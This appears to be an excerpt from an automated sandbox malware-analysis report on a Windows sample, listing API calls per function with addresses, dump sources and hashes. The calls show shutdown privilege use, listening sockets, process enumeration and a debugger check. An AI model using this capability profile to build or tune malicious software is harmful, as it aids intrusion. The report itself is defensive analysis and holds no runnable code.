                                                            • Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID: 3cA$_A
                                                            • API String ID: 674341424-3480954128
                                                            • Opcode ID: b89c626c4fab00b03cda0a74c0410a572875634de8e20fba3812235e50cf766d
                                                            • Instruction ID: 703a96bf305cb9905ff3d3c25826e0fcfbd93ba8a00a4d78e9854e8314894fca
                                                            • Opcode Fuzzy Hash: b89c626c4fab00b03cda0a74c0410a572875634de8e20fba3812235e50cf766d
                                                            • Instruction Fuzzy Hash: AB229B716083009FD724DF14C881BABB7E4AF85314F11492EF89A97392DB78E945CB9B
                                                            APIs
                                                              • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                              • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                              • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                            • Instruction ID: a9b7a44e2451b6884de2a96c8f52f71cfd0e95415fa4985b61f57267d5601e10
                                                            • Opcode Fuzzy Hash: 54329107cda8fc21248f4887d0b4108f88f23b4200919f0ee4a3738f6efa1ba1
                                                            • Instruction Fuzzy Hash: D201F7317916116BF7286668ACAAFBB7358DB05345F2008BBFD03E21D2FD591C058A9F
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 004762DC
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                            • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                            • closesocket.WSOCK32(00000000), ref: 00476344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                            • Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
                                                            • Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
                                                            • Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                            APIs
                                                              • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                              • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                            • _memmove.LIBCMT ref: 00450258
                                                            • _memmove.LIBCMT ref: 0045036D
                                                            • _memmove.LIBCMT ref: 00450414
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: dce42870d7098ac48325943f50e90a35d891743806a5d1066521839b2bd27497
                                                            • Instruction ID: ce31bd404333394545349dab4fd8ad238969c684e33d592a62d2001407cdf1f6
                                                            • Opcode Fuzzy Hash: dce42870d7098ac48325943f50e90a35d891743806a5d1066521839b2bd27497
                                                            • Instruction Fuzzy Hash: 3202E270A00205DBCF04DF65D9816AEBBF5EF84304F54806EE80ADB392EB39D955CB99
                                                            APIs
                                                              • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                            • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                              • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                            • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                            • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                            • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                            APIs
                                                              • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 0047679E
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                            • closesocket.WSOCK32(00000000), ref: 00476821
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                            • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                            • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                            • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                            • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                            • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                            • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                            APIs
                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 44706859-0
                                                            • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                            • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                            • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                            • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 0046C432
                                                            • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                            • CoUninitialize.OLE32 ref: 0046C6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                            • String ID: .lnk
                                                            • API String ID: 2683427295-24824748
                                                            • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                            • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                            • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                            • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                            • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                            • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                            • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                              • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                                                            • Instruction ID: a98c0e68db7b9d45d0fd814aff1298f869d04e0007e226020b87bcf654703779
                                                            • Opcode Fuzzy Hash: 55b2806c571e794d70189e9b258b2a54ff26ce71ab56e674bdcd20fc5077a503
                                                            • Instruction Fuzzy Hash: BB519171504300AFD310EF21CC85EABB7E8EF88714F10492EF595A72A1DB34AD08CB96
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: b3d46ec49be45c23440a31788730bf7b7fd270465164d5d236c6faca290e0b28
                                                            • Instruction ID: d66d97c7bb63d5e7dad9b567a4e3f94d41a6da7275ee88609bc8c1bec3a8e44c
                                                            • Opcode Fuzzy Hash: b3d46ec49be45c23440a31788730bf7b7fd270465164d5d236c6faca290e0b28
                                                            • Instruction Fuzzy Hash: 21322675A007059FD728CF2AC481A6AB7F0FF48310B15C56EE89ADB3A2E774E941CB44
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: e6327bc979127c1e190f0354f51c9703924f900fef46b52be165e7f6d3ae9c94
                                                            • Instruction ID: 97e6fa55f52fdedc64eb36c533065f345fcd4e8e1beeb73d4f24c64f527f6271
                                                            • Opcode Fuzzy Hash: e6327bc979127c1e190f0354f51c9703924f900fef46b52be165e7f6d3ae9c94
                                                            • Instruction Fuzzy Hash: 0941DA71604205BFEB20DE65DE81EFB77BCEB40314F10806FFA49A6241DABC9E419658
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B91459
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B91463
                                                            • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00B91470
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: eaf3c5ba80ea6c064f96931e586c766270dfd0397236572a3a71fc29a85ca697
                                                            • Instruction ID: eb4f9c2a11e1723a2b59e9f28115ece3c78b519e8a9949424074defbe0298900
                                                            • Opcode Fuzzy Hash: eaf3c5ba80ea6c064f96931e586c766270dfd0397236572a3a71fc29a85ca697
                                                            • Instruction Fuzzy Hash: 3E31C3749012289BCF21DF68DD89B98BBB8EF08310F5041EAE40CA7250EB309B859F45
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID:
                                                            • API String ID: 1682464887-0
                                                            • Opcode ID: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                            • Instruction ID: 737ef1c34fd19c378388d330bbb387c55d680846c188baab6e7c30573ba64571
                                                            • Opcode Fuzzy Hash: e21071a1f309060a69139baf21bf0b81cefe721e06a6328ca3586a1a9a93214d
                                                            • Instruction Fuzzy Hash: 7D21AE75A10108EFCB00EFA5D880AEEBBB8FF48314F0080AAE905AB351DB359D59CB55
                                                            APIs
                                                              • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                              • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                            • GetLastError.KERNEL32 ref: 00458865
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
